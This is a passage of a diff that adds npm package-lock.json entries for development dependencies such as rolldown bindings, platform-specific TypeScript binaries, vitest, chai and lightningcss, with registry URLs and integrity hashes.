+				"@napi-rs/wasm-runtime": "^1.1.6"
+			},
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-wasm32-wasi/node_modules/@emnapi/core": {
+			"version": "1.11.1",
+			"resolved": "https://registry.npmjs.org/@emnapi/core/-/core-1.11.1.tgz",
+			"integrity": "sha512-RSvbQmHzdKzNsLYa/wHrbc3KN4sYLKAdPZxqiM2HATqv/SBk2/ENSHpvXGaLOMcsAyz0poEGqkmmKYG3OWiJEQ==",
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"dependencies": {
+				"@emnapi/wasi-threads": "1.2.2",
+				"tslib": "^2.4.0"
+			}
+		},
+		"node_modules/@rolldown/binding-wasm32-wasi/node_modules/@emnapi/runtime": {
+			"version": "1.11.1",
+			"resolved": "https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.11.1.tgz",
+			"integrity": "sha512-vgj7R3y3Wgx24IQaGPA/R6YFXLHVMOZ0uVEyIQPaWs+rd1AzfEMXlAC22FYwO1XkKR6NPsq7mUandH8oIRdZFw==",
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"dependencies": {
+				"tslib": "^2.4.0"
+			}
+		},
+		"node_modules/@rolldown/binding-wasm32-wasi/node_modules/@emnapi/wasi-threads": {
+			"version": "1.2.2",
+			"resolved": "https://registry.npmjs.org/@emnapi/wasi-threads/-/wasi-threads-1.2.2.tgz",
+			"integrity": "sha512-c95qOXkHdydNKhscBTebqEC1CVAZpyqOfVfBzQ1qgzyl3gfeldUjIggDbIZgDKsHLgnsM+igH7TJ/eAasaVuMA==",
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"dependencies": {
+				"tslib": "^2.4.0"
+			}
+		},
+		"node_modules/@rolldown/binding-win32-arm64-msvc": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-win32-arm64-msvc/-/binding-win32-arm64-msvc-1.1.5.tgz",
+			"integrity": "sha512-gHv82k63z4qpV5+Q1y/12KrK0ltWBukVDI8nZcbT7Tt/ZlOIVwppazneq0F93oDxTo3IgAMEDIoQh3E2n6mVsw==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"win32"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-win32-x64-msvc": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-win32-x64-msvc/-/binding-win32-x64-msvc-1.1.5.tgz",
+			"integrity": "sha512-tTZuDBPw85tEN5PQi1pnEBzDy0Z49HtScLAbD5t6hyeU92A95pRWaSMw1GZZi/RwgSgUIl0xrSlXIT/9QzvYSA==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"win32"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/pluginutils": {
+			"version": "1.0.1",
+			"resolved": "https://registry.npmjs.org/@rolldown/pluginutils/-/pluginutils-1.0.1.tgz",
+			"integrity": "sha512-2j9bGt5Jh8hj+vPtgzPtl72j0yRxHAyumoo6TNfAjsLB04UtpSvPbPcDcBMxz7n+9CYB0c1GxQFxYRg2jimqGw==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/@standard-schema/spec": {
+			"version": "1.1.0",
+			"resolved": "https://registry.npmjs.org/@standard-schema/spec/-/spec-1.1.0.tgz",
+			"integrity": "sha512-l2aFy5jALhniG5HgqrD6jXLi/rUWrKvqN/qJx6yoJsgKhblVd+iqqU4RCXavm/jPityDo5TCvKMnpjKnOriy0w==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/@tybys/wasm-util": {
+			"version": "0.10.3",
+			"resolved": "https://registry.npmjs.org/@tybys/wasm-util/-/wasm-util-0.10.3.tgz",
+			"integrity": "sha512-F3fo1MYrRJYL3zER0OUOmkutjr1Vp23m7OsSgp7nq4SP6OqX6C/56XFIPAl5bt3zaBRjmW7SGz3u/6LwFpYcOg==",
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"dependencies": {
+				"tslib": "^2.4.0"
+			}
+		},
+		"node_modules/@types/chai": {
+			"version": "5.2.3",
+			"resolved": "https://registry.npmjs.org/@types/chai/-/chai-5.2.3.tgz",
+			"integrity": "sha512-Mw558oeA9fFbv65/y4mHtXDs9bPnFMZAL/jxdPFUpOHHIXX91mcgEHbS5Lahr+pwZFR8A7GQleRWeI6cGFC2UA==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"@types/deep-eql": "*",
+				"assertion-error": "^2.0.1"
+			}
+		},
+		"node_modules/@types/deep-eql": {
+			"version": "4.0.2",
+			"resolved": "https://registry.npmjs.org/@types/deep-eql/-/deep-eql-4.0.2.tgz",
+			"integrity": "sha512-c9h9dVVMigMPc4bwTvC5dxqtqJZwQPePsWjPlpSOnojbor6pGqdk541lfA7AqFQr5pB1BRdq0juY9db81BwyFw==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/@types/estree": {
+			"version": "1.0.9",
+			"resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.9.tgz",
+			"integrity": "sha512-GhdPgy1el4/ImP05X05Uw4cw2/M93BCUmnEvWZNStlCzEKME4Fkk+YpoA5OiHNQmoS7Cafb8Xa3Pya8m1Qrzeg==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/@types/node": {
+			"version": "22.20.1",
+			"resolved": "https://registry.npmjs.org/@types/node/-/node-22.20.1.tgz",
+			"integrity": "sha512-EANqOCF9QFyra+4pfxUcX9STKJpCLjMbObVzljIJomAWSnuSIEAvyzEU53GaajbXJEgdh0iEcPL+DGvpUd4k1Q==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"undici-types": "~6.21.0"
+			}
+		},
+		"node_modules/@typescript/typescript-aix-ppc64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-aix-ppc64/-/typescript-aix-ppc64-7.0.2.tgz",
+			"integrity": "sha512-MTKKkWB7p/0E9xi1d1tHtZ5PiLkGEMIq88pK2CubZjOsLtYTLqhgIgi6zepFa+9GHZ6h05NMCkQxGKiPXMxXtQ==",
+			"cpu": [
+				"ppc64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"aix"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-darwin-arm64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-darwin-arm64/-/typescript-darwin-arm64-7.0.2.tgz",
+			"integrity": "sha512-gowzar9MwS/aRWp6f3a4KUqzRjAZjOsmGNCM6LcTgXum+dBfgsBVMN+AgvOCCbguXyick6LJhpBszxMebJ8syA==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"darwin"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-darwin-x64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-darwin-x64/-/typescript-darwin-x64-7.0.2.tgz",
+			"integrity": "sha512-SZ9xZInqApNlNGc9s0W1VSsktYSOe9cFqNOIqmN1Gs8SmkjKZYFt017G4VwPxASInODuAdbTW7sXiFUf893RgA==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"darwin"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-freebsd-arm64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-freebsd-arm64/-/typescript-freebsd-arm64-7.0.2.tgz",
+			"integrity": "sha512-W5NH4y/J0plIIS5b2xvTEkU7JFxyqdMAOgf+Ilhl0vHQXKO5dZoxd+C/jEtq56c4F3wk71RB4BMRQ2XdI+bwYQ==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"freebsd"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-freebsd-x64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-freebsd-x64/-/typescript-freebsd-x64-7.0.2.tgz",
+			"integrity": "sha512-UMGDx5sTpzNw3WiPebH7l90IWfJggEd+egHt/q6p7/Cm3zqoV7VxkGXt+3DxPIw8CcmvAB0j3sVVfbhX+M4Tpw==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"freebsd"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-linux-arm": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-linux-arm/-/typescript-linux-arm-7.0.2.tgz",
+			"integrity": "sha512-gffT3xPz9sR7j/YJExkyPntrI0P2EP9XbOyWzth2/Gs0RstK+90RBcO0ncXoXy/beYll1SXw846Nf2zdnEz0QQ==",
+			"cpu": [
+				"arm"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-linux-arm64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-linux-arm64/-/typescript-linux-arm64-7.0.2.tgz",
+			"integrity": "sha512-Qh4eU4/y3yDjnfjjyPYihMj5/ODIlmt+Bzu17OI+fiSRDW57QmU5SiN63exPRNJPKUzcc1INa1NXdrJ+MqHjUQ==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-linux-loong64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-linux-loong64/-/typescript-linux-loong64-7.0.2.tgz",
+			"integrity": "sha512-uEHck9i8hoAzXPiYRib1O7miOnz23SxIeVl6F4LXox+qov1K35jHcEW6VHKvZI+pyvl7fZEP4MCU5LYvIq1GuQ==",
+			"cpu": [
+				"loong64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-linux-mips64el": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-linux-mips64el/-/typescript-linux-mips64el-7.0.2.tgz",
+			"integrity": "sha512-R4KvAMnE43W5Qeqb0Ly56O3mWMWIAgsMyz36DCaycd5nbg/9kzm0liw3JocfRqyJY0KPmzFjbswozXyW0DnIYA==",
+			"cpu": [
+				"mips64el"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-linux-ppc64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-linux-ppc64/-/typescript-linux-ppc64-7.0.2.tgz",
+			"integrity": "sha512-DORx5b3sd/4S7eayxm4FQv+A7CrkUIGRaHiwI8oiHTAI1fAPWhF4J0vAlkC8biAlHSVVwxMQ3tjZ2/DVbnQiiA==",
+			"cpu": [
+				"ppc64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-linux-riscv64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-linux-riscv64/-/typescript-linux-riscv64-7.0.2.tgz",
+			"integrity": "sha512-wf0jqEDOjrPRnKwYRyyJDRo11KMbvMFrU+q4zqKyChODBzvlkbhNQfKvLxQCcwTpdDaXSHZTVuh0JoCrKCUMHQ==",
+			"cpu": [
+				"riscv64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-linux-s390x": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-linux-s390x/-/typescript-linux-s390x-7.0.2.tgz",
+			"integrity": "sha512-IkwJc3L7yhytWd/ewjyxNDfOmswCm9GWMJT/ue/dU4aZNbwZeYAetq42VyLmsmSjvoX7z74X6ZaYCtzAr0EuGw==",
+			"cpu": [
+				"s390x"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-linux-x64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-linux-x64/-/typescript-linux-x64-7.0.2.tgz",
+			"integrity": "sha512-EYdf2cNg7rgCWJnxCdJ+F3V39O8ihb37eHAu1LK8oAFizgTQbPOK7zHHXbPt8rX24COqODXeI3sIf0fCXG7H/A==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-netbsd-arm64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-netbsd-arm64/-/typescript-netbsd-arm64-7.0.2.tgz",
+			"integrity": "sha512-+polYF4MF04aPpO5FTkHran9yUQDSXqy5GiSDKpsll5jy3l3+g9QLhpf39T+ePtefhXLOGrLl0QIjkQP6VnelA==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"netbsd"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-netbsd-x64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-netbsd-x64/-/typescript-netbsd-x64-7.0.2.tgz",
+			"integrity": "sha512-8YIT0EHM/3dq10ZOVF/A7pc/YSMtbcecct4rWtexrnSCHOPcpC2KTLXfTCR6vDpnSiY12heNb1GiN/wu+T/FyA==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"netbsd"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-openbsd-arm64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-openbsd-arm64/-/typescript-openbsd-arm64-7.0.2.tgz",
+			"integrity": "sha512-APT8+ClYnuYm1u9+kgGXoMj2VzWzcymwh2gNSQVySHfkRDGOTVkoWLjCmOQSaO+PoqQ57B0flRp9SA+7GnnkzQ==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"openbsd"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-openbsd-x64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-openbsd-x64/-/typescript-openbsd-x64-7.0.2.tgz",
+			"integrity": "sha512-yX7s+Q0Dln0Dt9tEzZsAjXXR/+ytBM7AlglaqyeMPxQszJ1JhlJdZ6jLA+IzldHtflX81em7lDao1xXu+aRRkg==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"openbsd"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-sunos-x64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-sunos-x64/-/typescript-sunos-x64-7.0.2.tgz",
+			"integrity": "sha512-dLJDGaLZ1D4HPQn62u1n8mBDkJREwMsAkCdkwd4Ieqw+x3TUyTsqY0YiBCtE6H6OzzgGk3iuZ3vFWRS+E8/d1g==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"sunos"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-win32-arm64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-win32-arm64/-/typescript-win32-arm64-7.0.2.tgz",
+			"integrity": "sha512-Gyl1Vy6OsWesLzmq+EP0Fb7b4Nid5232AvcA2SFcdYreldpNtYFFofPjnt62y9hQy7VTaZp65ICJjuAQRaVcIQ==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"win32"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@typescript/typescript-win32-x64": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/@typescript/typescript-win32-x64/-/typescript-win32-x64-7.0.2.tgz",
+			"integrity": "sha512-0BQ3HkAHHlKLSp1qRvf3SUhGpGsDuhB/jgFw75guyqbxJqEaS0Cw/VFO8i2nHglJUzQCRtMMR/IBAKE3ETMC4g==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "Apache-2.0",
+			"optional": true,
+			"os": [
+				"win32"
+			],
+			"engines": {
+				"node": ">=16.20.0"
+			}
+		},
+		"node_modules/@vitest/expect": {
+			"version": "4.1.10",
+			"resolved": "https://registry.npmjs.org/@vitest/expect/-/expect-4.1.10.tgz",
+			"integrity": "sha512-YsCn+qAk1GWjQOWFEsEcL2gNQ0zmVmQu3T03qP6UyjhtmdtwtbuI+DASn/7iQB3HGTXkdBwGddzxPlmiql5vlA==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"@standard-schema/spec": "^1.1.0",
+				"@types/chai": "^5.2.2",
+				"@vitest/spy": "4.1.10",
+				"@vitest/utils": "4.1.10",
+				"chai": "^6.2.2",
+				"tinyrainbow": "^3.1.0"
+			},
+			"funding": {
+				"url": "https://opencollective.com/vitest"
+			}
+		},
+		"node_modules/@vitest/mocker": {
+			"version": "4.1.10",
+			"resolved": "https://registry.npmjs.org/@vitest/mocker/-/mocker-4.1.10.tgz",
+			"integrity": "sha512-v0xaezt+DKEmKfaxg133ldzADrwLGd7Ze1MfQQTYfvs8OqZIwbxyxaYURivwV7sWy5fqn3rH5uOrSp07bp44Ow==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"@vitest/spy": "4.1.10",
+				"estree-walker": "^3.0.3",
+				"magic-string": "^0.30.21"
+			},
+			"funding": {
+				"url": "https://opencollective.com/vitest"
+			},
+			"peerDependencies": {
+				"msw": "^2.4.9",
+				"vite": "^6.0.0 || ^7.0.0 || ^8.0.0"
+			},
+			"peerDependenciesMeta": {
+				"msw": {
+					"optional": true
+				},
+				"vite": {
+					"optional": true
+				}
+			}
+		},
+		"node_modules/@vitest/pretty-format": {
+			"version": "4.1.10",
+			"resolved": "https://registry.npmjs.org/@vitest/pretty-format/-/pretty-format-4.1.10.tgz",
+			"integrity": "sha512-W1HsjSH4MXQ9YfmmhLAoIYf1HRfekQCGngeIgcei6MP5QQGWUe0gkopdZQaVCFO+JDJMrAJGwa5pRpNpvy4P8Q==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"tinyrainbow": "^3.1.0"
+			},
+			"funding": {
+				"url": "https://opencollective.com/vitest"
+			}
+		},
+		"node_modules/@vitest/runner": {
+			"version": "4.1.10",
+			"resolved": "https://registry.npmjs.org/@vitest/runner/-/runner-4.1.10.tgz",
+			"integrity": "sha512-IKI6kpIH+LmpROplyLwBBaCfMgOZOMsygVa6BARD6ahA04VRuJSa6OaVG7kRvSEMD870Vd91rSSw0eegtWyLGg==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"@vitest/utils": "4.1.10",
+				"pathe": "^2.0.3"
+			},
+			"funding": {
+				"url": "https://opencollective.com/vitest"
+			}
+		},
+		"node_modules/@vitest/snapshot": {
+			"version": "4.1.10",
+			"resolved": "https://registry.npmjs.org/@vitest/snapshot/-/snapshot-4.1.10.tgz",
+			"integrity": "sha512-xRkfOT1qpTAi/Ti4Y1LtfRc3kEuqxGw59eN2jN9pRWMtS/XDevekhcFSqvQqjUNGksfjMJu3Y+oJ+4Ypn2OaJw==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"@vitest/pretty-format": "4.1.10",
+				"@vitest/utils": "4.1.10",
+				"magic-string": "^0.30.21",
+				"pathe": "^2.0.3"
+			},
+			"funding": {
+				"url": "https://opencollective.com/vitest"
+			}
+		},
+		"node_modules/@vitest/spy": {
+			"version": "4.1.10",
+			"resolved": "https://registry.npmjs.org/@vitest/spy/-/spy-4.1.10.tgz",
+			"integrity": "sha512-PLf/Ugvoq5wO/b4rwYCR1h2PSIdXz7wnkQFMiUpLdtM7l6pqVFcQIBEHyT1+l+cj7mNwAfZHzqXqDyjvOuwbDw==",
+			"dev": true,
+			"license": "MIT",
+			"funding": {
+				"url": "https://opencollective.com/vitest"
+			}
+		},
+		"node_modules/@vitest/utils": {
+			"version": "4.1.10",
+			"resolved": "https://registry.npmjs.org/@vitest/utils/-/utils-4.1.10.tgz",
+			"integrity": "sha512-fy9am/HWxbaGt/Sawrp90vt6Y6jQwf1RX77cz3uwoJwJVMli/e1IEwRPnMNJ7vKfPTwo0diXifkpPvwH9v7nGA==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"@vitest/pretty-format": "4.1.10",
+				"convert-source-map": "^2.0.0",
+				"tinyrainbow": "^3.1.0"
+			},
+			"funding": {
+				"url": "https://opencollective.com/vitest"
+			}
+		},
+		"node_modules/assertion-error": {
+			"version": "2.0.1",
+			"resolved": "https://registry.npmjs.org/assertion-error/-/assertion-error-2.0.1.tgz",
+			"integrity": "sha512-Izi8RQcffqCeNVgFigKli1ssklIbpHnCYc6AknXGYoB6grJqyeby7jv12JUQgmTAnIDnbck1uxksT4dzN3PWBA==",
+			"dev": true,
+			"license": "MIT",
+			"engines": {
+				"node": ">=12"
+			}
+		},
+		"node_modules/chai": {
+			"version": "6.2.2",
+			"resolved": "https://registry.npmjs.org/chai/-/chai-6.2.2.tgz",
+			"integrity": "sha512-NUPRluOfOiTKBKvWPtSD4PhFvWCqOi0BGStNWs57X9js7XGTprSmFoz5F0tWhR4WPjNeR9jXqdC7/UpSJTnlRg==",
+			"dev": true,
+			"license": "MIT",
+			"engines": {
+				"node": ">=18"
+			}
+		},
+		"node_modules/convert-source-map": {
+			"version": "2.0.0",
+			"resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz",
+			"integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/detect-libc": {
+			"version": "2.1.2",
+			"resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.1.2.tgz",
+			"integrity": "sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"engines": {
+				"node": ">=8"
+			}
+		},
+		"node_modules/es-module-lexer": {
+			"version": "2.3.1",
+			"resolved": "https://registry.npmjs.org/es-module-lexer/-/es-module-lexer-2.3.1.tgz",
+			"integrity": "sha512-shc1dbU90Yl/xq1QrC7QRtfcwURZuVRfPhZbDoldJ1cn1gzDvBaBWlv0eFolj5+0znnPJz5TXLxsN77X/12KTA==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/estree-walker": {
+			"version": "3.0.3",
+			"resolved": "https://registry.npmjs.org/estree-walker/-/estree-walker-3.0.3.tgz",
+			"integrity": "sha512-7RUKfXgSMMkzt6ZuXmqapOurLGPPfgj6l9uRZ7lRGolvk0y2yocc35LdcxKC5PQZdn2DMqioAQ2NoWcrTKmm6g==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"@types/estree": "^1.0.0"
+			}
+		},
+		"node_modules/expect-type": {
+			"version": "1.4.0",
+			"resolved": "https://registry.npmjs.org/expect-type/-/expect-type-1.4.0.tgz",
+			"integrity": "sha512-KfYbmpRm0VbLjEvVa9yGwCi9GI34xvi7A/HXYWQO65CSD2u3MczUJSuwXKFIxlGsgBQizV9q5J9NHj4VG0n+pA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"engines": {
+				"node": ">=12.0.0"
+			}
+		},
+		"node_modules/fdir": {
+			"version": "6.5.0",
+			"resolved": "https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz",
+			"integrity": "sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==",
+			"dev": true,
+			"license": "MIT",
+			"engines": {
+				"node": ">=12.0.0"
+			},
+			"peerDependencies": {
+				"picomatch": "^3 || ^4"
+			},
+			"peerDependenciesMeta": {
+				"picomatch": {
+					"optional": true
+				}
+			}
+		},
+		"node_modules/fsevents": {
+			"version": "2.3.3",
+			"resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz",
+			"integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==",
+			"dev": true,
+			"hasInstallScript": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"darwin"
+			],
+			"engines": {
+				"node": "^8.16.0 || ^10.6.0 || >=11.0.0"
+			}
+		},
+		"node_modules/jiti": {
+			"version": "2.7.0",
+			"resolved": "https://registry.npmjs.org/jiti/-/jiti-2.7.0.tgz",
+			"integrity": "sha512-AC/7JofJvZGrrneWNaEnJeOLUx+JlGt7tNa0wZiRPT4MY1wmfKjt2+6O2p2uz2+skll8OZZmJMNqeke7kKbNgQ==",
+			"dev": true,
+			"license": "MIT",
+			"bin": {
+				"jiti": "lib/jiti-cli.mjs"
+			}
+		},
+		"node_modules/lightningcss": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss/-/lightningcss-1.33.0.tgz",
+			"integrity": "sha512-WkUDrojuJs0xkgGf2udWxa3yGBRxPtxUkB79i6aCZLRgc7PM8fZe9TosfPDcvEpQZbuFASnHYmRLBLUbmLOIIA==",
+			"dev": true,
+			"license": "MPL-2.0",
+			"dependencies": {
+				"detect-libc": "^2.0.3"
+			},
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			},
+			"optionalDependencies": {
+				"lightningcss-android-arm64": "1.33.0",
+				"lightningcss-darwin-arm64": "1.33.0",
+				"lightningcss-darwin-x64": "1.33.0",
+				"lightningcss-freebsd-x64": "1.33.0",
+				"lightningcss-linux-arm-gnueabihf": "1.33.0",
+				"lightningcss-linux-arm64-gnu": "1.33.0",
+				"lightningcss-linux-arm64-musl": "1.33.0",
+				"lightningcss-linux-x64-gnu": "1.33.0",
+				"lightningcss-linux-x64-musl": "1.33.0",
+				"lightningcss-win32-arm64-msvc": "1.33.0",
+				"lightningcss-win32-x64-msvc": "1.33.0"
+			}
+		},
+		"node_modules/lightningcss-android-arm64": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss-android-arm64/-/lightningcss-android-arm64-1.33.0.tgz",
+			"integrity": "sha512-gEpRTalKdosp4Bb8qWtc2iOgE5SeIHlpS1up9bFq2wAyYhl1UdTObYiHe98zEM9SQvSoqQZ1IQD0JNpg3Ml5pg==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MPL-2.0",
+			"optional": true,
+			"os": [
+				"android"
+			],
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			}
+		},
+		"node_modules/lightningcss-darwin-arm64": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss-darwin-arm64/-/lightningcss-darwin-arm64-1.33.0.tgz",
+			"integrity": "sha512-Sciaz8eenNTKn9b3t7+xr0ipTp9YxKQY4npwQ3mrRuL0BAVHBLyZxofhaKBAVtzmtRZ/zTyo0/to4B1uWG/Djg==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MPL-2.0",
+			"optional": true,
+			"os": [
+				"darwin"
+			],
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			}
+		},
+		"node_modules/lightningcss-darwin-x64": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss-darwin-x64/-/lightningcss-darwin-x64-1.33.0.tgz",
+			"integrity": "sha512-Z5UPAxzrjlWNNyGy6i65cJzzvgJ5D3T6wMvs+gWpY9d7qRhANrxqAp6LhxIgZhWEw18RfJTGcRxjuLIBr+m8XQ==",
+			"cpu": [
+				"x64"
